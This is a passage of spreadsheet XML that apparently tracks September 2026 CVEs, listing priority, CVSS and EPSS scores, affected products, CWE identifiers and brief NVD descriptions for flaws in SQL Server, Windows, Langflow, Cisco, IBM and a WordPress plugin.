      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K175" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K180"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80" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K181"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81" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73173</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-306: Missing Authentication for Critical Function vulnerability in the edgserver management protocol of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote unauthenticated attacker to invoke critical device-management functions, including network reconfiguration, reboot, reset, and firmware upgrade, by sending crafted requests to TCP port 5058.</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73173</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75624</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr">
        <is>
          <t>ibm:aix, ibm:app_connect_enterprise, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.27 could allow a remote authenticated attacker to bypass security restrictions due to incorrect authorization.</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75624</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76059</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 An attacker who could submit custom component source code could bypass the static security scanner by crafting an annotated class-body assignment that resolved to a dangerous callable through alias tracking; the resolved value was never checked against the dangerous callable blocklist due to the logic error. If the crafted component reached the runtime execution path, the attacker could cause arbitrary operating system commands to execute on the server in-process, with the privileges of the running service.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76059</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76409</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-76409 are related to improper limitation of a pathname issues that are grouped under the Common Weakness Enumeration (CWE) CWE-22.</t>
        </is>
      </c>
      <c r="S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76409</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K187"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87" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78088</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>The Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Overwrite in all versions up to, and including, 32.0.1 due to insufficient file path validation in the 'baseUrlForFacebook' parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite known files which may lead to remote code execution when certain preconditions are met.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78088</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78569</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow an authenticated attacker to execute arbitrary code due to an incomplete denylist in the security scanner.</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78569</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78571</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an unguarded eval() call on attacker-controlled input.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78571</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78575</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
